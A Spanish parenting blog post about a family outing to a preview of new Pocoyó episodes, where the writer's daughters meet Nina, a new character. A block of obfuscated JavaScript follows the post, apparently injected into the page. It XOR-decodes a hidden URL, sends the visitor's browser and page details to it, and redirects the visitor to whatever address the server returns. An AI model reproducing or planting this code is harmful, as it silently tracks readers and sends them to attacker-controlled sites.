Crece la pandilla de Pocoyó con la llegada de Nina

El verde se ha convertido en el color favorito de Elena. Pero este no ha sido el único cambio en los últimos días en la vida de mi hija. Elena tiene una nueva mejor amiga a la que le cuenta sus cosas, se la lleva al parque y hasta le acompaña a la hora de dormirse.  Esta nueva compi de aventuras se llama Nina y es también amiga de Pocoyó. De hecho, conocimos a Nina a través de Pocoyó, que nos invitó el pasado sábado a la presentación de la próxima temporada de su serie.

¿Cuánto tiempo podría hacer que no me sentaba a ver un capítulo de Pocoyó? Quizás dos o tres años, desde que Elena abandonó al simpático personaje azul por la cerdita rosa, que a su vez ahora ha dicho adiós a nuestras vidas para dejar paso a una súper heroína que, bajo su disfraz de mariquita, esconde a una chica sencilla, tímida y torpe, muy torpe. Son pequeñas evoluciones que evidencian cómo nuestros hijos se van haciendo mayores. Aún así, cuando nos surgió la oportunidad de ir a ver en exclusiva los nuevos episodios de la nueva entrega de Pocoyó y de ponerle cara a Nina, un nuevo personaje de la serie, no lo dudamos. También por Ana, de dos años, que al final siempre termina sumándose a los planes de su hermana mayor. Pero en esta ocasión íbamos a hacer algo acorde a la edad de Ana y a sus gustos.

NINA_0101Su padre y yo pensamos que Elena se iba a aburrir “como una ostra”, que Ana iba a disfrutar como una “enana” y que sería una mañana de sábado sin pena ni gloria, pero nuestras predicciones fallaron (¡menos mal!). Elena se quedó encantada en cuanto Nina se asomó por la pantalla gigante de la Sala 25 de Kinépolis. Y es que Nina es guay. Viste completamente de verde, vive en un jardín rodeada de flores, hormigas y fresibayas. Le gusta la naturaleza, bailar, cantar y también cocinar. Tiene una mascota, Roberto, un robot con el que logra hacerse más grande para interactuar con Pocoyó y el resto de la pandilla, o al contrario, reduce a la pandilla y así pueden colarse en su particular universo. Nina se lleva genial con todos los personajes de la serie, aunque al principio su primer encontronazo con Pato no fue para tirar cohetes, pero ya se sabe que las primeras impresiones no siempre son de fiar.

Y Ana, ¿qué dijo?  Se asustó cuando vio a Pocoyó a tamaño real y no aguantó en la butaca sentada más de dos minutos, pero eso sí, estaba igual de encantada  (¡o más!) que su hermana con Nina. Y papá y mamá salieron felices por haber hecho un plan en familia en el que hija mayor e hija menor disfrutaron por igual, algo a veces un pelín complicado por la diferencia de edad, casi cuatro años, pero eso será motivo de un futuro post: Planes que hacer con hijas que se llevan varios años.

Hace ya cuatro días del evento y las dos continúan teniendo a Nina muy presente en su día a día, preguntando una y otra vez cuándo volverán a verla. Yo solo las puede decir que a partir del próximo 24 de marzo a las 20.00 horas en Youtubekids cuando ellas quieran.


var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}